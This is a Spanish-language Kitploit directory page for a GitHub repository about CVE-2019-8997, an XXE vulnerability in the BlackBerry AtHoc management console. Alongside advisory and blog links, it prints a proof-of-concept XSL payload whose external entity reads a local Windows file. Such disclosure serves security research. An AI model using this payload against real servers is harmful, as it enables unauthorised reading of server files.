Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-8997 — Una vulnerabilidad de Inyección de Entidades Externas XML (XXE) en el Sistema de Gestión (consola) de BlackBerry AtHoc en versiones anteriores a 7.6 HF-567 podría permitir a un atacante leer potencialmente archivos locales arbitrarios desde el servidor de aplicaciones o realizar solicitudes en la red introduciendo XML manipulado maliciosamente en un campo existente. | Kitploit
Herramientas/GitHubGitHub/nxkennedy/cve-2019-8997
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubnxkennedy/cve-2019-8997

CVE-2019-8997

Ver Repositorio
223hace 6 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Una vulnerabilidad de Inyección de Entidades Externas XML (XXE) en el Sistema de Gestión (consola) de BlackBerry AtHoc en versiones anteriores a 7.6 HF-567 podría permitir a un atacante leer potencialmente archivos locales arbitrarios desde el servidor de aplicaciones o realizar solicitudes en la red introduciendo XML manipulado maliciosamente en un campo existente.

Compartir

CVE-2019-8997

Una vulnerabilidad de inyección de entidad externa XML (XXE) en el sistema de gestión (consola) de BlackBerry AtHoc en versiones anteriores a 7.6 HF-567 podría permitir a un atacante leer archivos locales arbitrarios del servidor de aplicaciones o realizar solicitudes en la red mediante la introducción de XML manipulado maliciosamente en un campo existente.

Reportado por

Nolan B. Kennedy (nxkennedy)

Aviso de seguridad

http://support.blackberry.com/kb/articleDetail?articleNumber=000047227
https://nvd.nist.gov/vuln/detail/CVE-2019-8997

Entrada de blog

https://www.nolanbkennedy.com/feed/xxe-vulnerability-blackberry-athoc
https://www.mindpointgroup.com/blog/pen-test/xxe-vulnerability-in-blackberry-athoc-networked-crisis-communication-platform/

Exploit de prueba de concepto

root@kitploit:~
<!DOCTYPE doc [
<!ELEMENT doc ANY > 
<!ENTITY foo SYSTEM "file:///c:/windows/win.ini">
]>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:output method="html" />
<xsl:template match="/">

<doc>&foo;</doc>

<head></head>
<body style="margin: 0; padding: 0;" oncontextmenu="return
false;"></body>
</xsl:template>
</xsl:stylesheet>
Descargar herramienta